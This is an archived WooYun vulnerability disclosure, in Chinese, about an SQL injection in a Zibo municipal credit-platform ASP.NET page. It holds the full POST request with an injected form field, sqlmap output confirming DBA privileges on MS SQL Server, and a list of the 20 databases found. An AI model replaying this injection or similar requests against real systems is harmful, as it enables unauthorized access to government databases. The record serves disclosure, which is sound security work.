乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-05-18: 细节已通知厂商并且等待厂商处理中 2016-05-23: 厂商已经主动忽略漏洞,细节向公众公开
入口:
**.**.**.**/CreditPlatform/Pages/PingFenGS/ZongChengBaoGSYear.aspx
网上办事大厅:
**.**.**.**/ZiboHuiYuanShenBao/
POST包:
POST /CreditPlatform/Pages/PingFenGS/ZongChengBaoGSYear.aspx HTTP/1.1Host: **.**.**.**User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:43.0) Gecko/20100101 Firefox/43.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: **.**.**.**/CreditPlatform/Pages/PingFenGS/ZongChengBaoGSYear.aspxX-Forwarded-For: 1..Connection: closeContent-Type: multipart/form-data; boundary=---------------------------172172203313378Content-Length: 5589-----------------------------172172203313378Content-Disposition: form-data; name="__EVENTTARGET"-----------------------------172172203313378Content-Disposition: form-data; name="__EVENTARGUMENT"-----------------------------172172203313378Content-Disposition: form-data; name="__VIEWSTATE"/wEPDwUGODQ1NDMxD2QWAmYPZBYCAgMPZBYCAgEPZBYCZg9kFgJmD2QWBgIJDxBkEBUFAAQyMDEyBDIwMTMEMjAxNAQyMDE1FQUABDIwMTIEMjAxMwQyMDE0BDIwMTUUKwMFZ2dnZ2dkZAILDzwrAAsBAA8WCB4JUGFnZUNvdW50AgEeCERhdGFLZXlzFhQFJGM1NTE2MzY4LWZjMjgtNGE2MC05ZTEyLTY4ODE3OTYzODNkZAUkMGIzMTc2MTEtNjcwZS00ZjY0LTlkZmYtNTI2YmU5MzQyOWIzBSRmODIxMDliZS0wOWZkLTRiYzktYTQ0MS01MmIzNDM1MDI1OTIFJGRjZWRkOTFhLTQ5ZjEtNDkwZC1hMjFmLWQ3NzQyYTE4MzAyOAUkY2U4OWE4NWMtYzUzNC00NDcxLWE4M2ItMGI1NWFkMWU5ZjNkBSQ4NzNmM2QxNi04ZDBmLTQ0MDUtYTAxNy1kMWY3NjU5MTFlY2MFJDJjZDM5YjUyLWI0YjEtNGQzNy04Y2MzLTUyMDM2NmQ4YWJlMgUkOThmZTkyODAtZjBkMC00ZTY5LTk1OGMtYzRhMzBjMjhhZjBhBSQzNGNhOTlhMy0zZTc1LTQ2NzUtODcyYi04YmU1YjMxODE5MzEFJGQwYjk3ZTAzLTc5NTItNDY1ZS1iZDQ5LWI5NzUxMDU3NWJkOAUkNmY4OWEwMTEtY2M2My00MGRhLTk0ZDktYmZmMDdlMjk3ZDdmBSRjZTQzZjBkNS0xYWY3LTQyNDktYjcwNC0wNzJjYmY2MjFmZDYFJGZlMWUxNjgwLWRmNTYtNDMxZi05NzYxLTljOTNkMzFlNzMwOQUkOGE5OTI2NjEtNTM3YS00MzEyLTgyNzAtMjczMGRlMTEzOTNhBSQyZWUzN2RkNS1lNWYwLTQ0ZTgtYmRiMS03NTY5ODI4YzFhMTAFJGZlM2QwMmE0LWU0Y2QtNGE3YS04NGMzLTMxOTNiMGUxNDFkOQUkNTA2ZTE4ZWEtNmRhYy00M2NhLTg1ZGUtYzBjNTI0MTNlMzAxBSRjMGUxODYzMi1jYTljLTQzMDgtODViZi0xN2I5MTBkOThlNzIFJDVlZTE0OGI0LTRmNTctNDYyYy04ZmY0LTIxNDQwNDFmMjNlYwUkOGMyMDhjZGMtMjEzNi00MWRlLTg0YWEtN2M0YjQ2ZGI1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-----------------------------172172203313378Content-Disposition: form-data; name="__EVENTVALIDATION"/wEWCwK1voO+CQK4qt/MCQKplrXzCAKplrHzCAL3xK/fDALSzZfeDAKQmb6wCQLTjv3WAQLTjpG7CQLTjqWADgLTjrnlB1yIj+lapfWeTDgHzAPAK0VrHosQ-----------------------------172172203313378Content-Disposition: form-data; name="ctl00$MainContent$txtDanweiName"ABCD1*-----------------------------172172203313378Content-Disposition: form-data; name="ctl00$MainContent$CBCorp$0"on-----------------------------172172203313378Content-Disposition: form-data; name="ctl00$MainContent$btnOK"??????′¢-----------------------------172172203313378Content-Disposition: form-data; name="ctl00$MainContent$dtbPingJiaDate"-----------------------------172172203313378Content-Disposition: form-data; name="ctl00$MainContent$yearDrop"2015-----------------------------172172203313378--
DBA权限:
[02:34:12] [INFO] testing Microsoft SQL Server[02:34:12] [INFO] confirming Microsoft SQL Server[02:34:14] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2008 R2 or 7web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008[02:34:14] [INFO] testing if current user is DBAcurrent user is DBA: True[02:34:14] [WARNING] HTTP error codes detected during run:500 (Internal Server Error) - 1 times[02:34:14] [INFO] fetched data logged to text files under 'C:\Documents and Settings\Administrator\.sqlmap\output\**.**.**.**'
20个库:
available databases [20]:[*] ArcGisSDE[*] dxgxzz[*] EpointFrame8_Monitor[*] EpointFrame_ZBJS[*] EpointNetoffice[*] master[*] model[*] msdb[*] ReportServer[*] ReportServerTempDB[*] rmgyzz[*] sde[*] stzxzz[*] szhwzz[*] tempdb[*] yljzz[*] ZiBoDaJianGuan[*] ZiBoDJG_EpointSystemSupport[*] ZiBoDJG_XZSP[*] ZiBoZJZ
分开?过滤
危害等级:无影响厂商忽略
忽略时间:2016-05-23 13:00
漏洞Rank:8 (WooYun评价)
暂无